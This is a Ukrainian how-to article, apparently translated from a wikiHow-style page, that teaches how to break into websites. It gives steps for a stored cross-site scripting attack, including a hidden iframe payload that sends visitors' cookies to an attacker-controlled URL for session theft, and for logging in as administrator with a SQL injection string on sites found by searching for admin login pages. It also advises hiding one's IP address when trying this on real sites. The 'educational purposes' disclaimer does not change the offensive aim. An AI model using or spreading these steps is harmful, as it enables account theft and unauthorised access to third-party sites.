1. Головна
    2. Комп'ютери та електроніка
    3. Як зламати веб–сайт

Як зламати веб–сайт

Зверніть увагу: Ця інструкція наведена виключно в освітніх цілях, щоб допомогти вивчити методи злому в законних цілях і зрозуміти принцип роботи хакерів для захисту своїх веб-сайтів. Ця інструкція допоможе отримати доступ до веб-сайтів з низьким рівнем захисту.

Метод1З 3:
Застосування міжсайтового скриптингу

  1. Знайдіть вразливий сайт, на якому можна розміщувати контент. Хороший приклад-дошка оголошень. Пам'ятайте, якщо сайт добре захищений, це не спрацює.
  2. Перейдіть до створення поста. Вам потрібно в тіло поста Вставити спеціальний код, що збирає дані тих, хто на нього клікне.
    • Ви захочете перевірити, чи відсіває система код. Опублікуйте &#Lt; script...&#gt;alert(“test”)&#lt;/...script &#gt; (не забудьте прибрати "..."). Якщо при натисканні на свій пост з'являється вікно з попередженням, тоді цей сайт вразливий для атаки.
  3. Створіть і завантажте свій PHP-скрипт, який буде отримувати дані. мета цієї атаки - зібрати дані Користувача типу "cookie", що зберігають інформацію про облікові записи користувачів. Її можна використовувати для входу в їх акаунти на вразливих веб-сайтах. Вам буде потрібно PHP-скрипт, який буде красти куки вашої мети і перенаправляти їх на ваш сайт. Завантажте скрипт php на веб-сайт, до якого ви маєте доступ і який підтримує php. Приклад коду PHP-скрипта можна знайти в розділі "приклади".
  4. Опублікуйте JavaScript-код. введіть в тіло поста JavaScript-код, який буде красти куки і відправляти їх на ваш сайт. Щоб зробити пост менш підозрілим і вберегти його від видалення, після коду впишіть який-небудь текст.
    • Приклад коду буде виглядати наступним чином: &#lt;...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location="ВАШURL/cookiecatcher.php?c=”+document.cookie)&#gt;&#lt;.../ iframe&#gt; (видалити...).
  5. Використання отриманих куки. після цього можете використовувати збережені у вас на веб-сайті дані куки для будь-яких цілей.

Метод2З 3:
Виконання ін'єкційних атак

  1. Знайдіть вразливий сайт. Вам потрібно знайти вразливий сайт з легкодоступним входом в якості адміністратора. Спробуйте пошукати в Google за запитом admin login.asp.
  2. Вхід в якості адміністратора. в поле "логін" введіть admin, а в якості пароля використовуйте одну з декількох комбінацій. Може бути багато різних варіантів, але поширеним параметром є 1'or'1'='1.
  3. Не втрачайте терпіння. вам буде потрібно деякий час для проб і помилок.
  4. Отримайте доступ на веб-сайт. зрештою, у вас повинно вийти знайти комбінацію, яка дозволить зайти на веб-сайт під логіном адміністратора, звичайно, якщо сайт вразливий до атак.

Метод3З 3:
Основа для успіху

  1. Вивчіть одну або декілька мов програмування. якщо ви дійсно хочете навчитися зламувати веб-сайти, вам потрібно зрозуміти принцип роботи комп'ютера та інших технологій. Вивчіть такі мови програмування, як Python або SQL, вони дозволять вам краще володіти комп'ютером і знайти слабкі місця систем.
  2. Вивчіть мову HTML на базовому рівні. щоб зламати веб-сайти, вам потрібно мати чітке уявлення про мови html і javascript. Це вимагає чимало часу, але в інтернеті досить безкоштовних способів для вивчення, тому головне - бажання, а можливості завжди знайдуться.
  3. Проконсультуйтеся з» білими " хакерами. "білі" хакери - це ті, хто використовує свої знання на благо добра, виявляючи уразливості систем безпеки і роблячи цим інтернет найкращим місцем для всіх. Якщо ви хочете навчитися злому, щоб використовувати його на благо добра або захистити ваш власний веб-сайт, можливо, вам знадобиться консультація "білих" хакерів.
  4. Дослідіть злом. якщо ви хочете стати хакером або захистити себе, вам належить багато в чому розібратися. На даний момент існує безліч дірок в безпеці веб-сайтів і їх список поповнюється з кожним днем, тому ви постійно повинні навчатися.
  5. Будьте в курсі. оскільки список можливих шляхів злому постійно змінюється, ви повинні йти в ногу з часом. Якщо зараз ви захищені від деяких типів атак, це не означає, що ви будете в безпеці завтра!

Поради

  • Почитайте хакерські форуми, щоб отримати багато корисних порад.

Попередження

  • Якщо ви вирішили випробувати свої хакерські навички в реальному світі, не забудьте приховати свою IP-адресу за допомогою програмного забезпечення, доступного в мережі Інтернет.
  • Прочитавши цю статтю, ви не станете хакером негайно. Вдосконалюйте свої навички і практикуйтеся, практикуйтеся І ще раз практикуйтеся.
  • Пам'ятайте, діяльність хакерів є незаконною. Якщо вас спіймають, це ваша вина.

Джерела

  1. Http://defencely.com/blog/10-popular-ways-hackers-hack-website/
  2. Http://www.benwiggy.com/hacking/website_hacking.php

Ще почитати: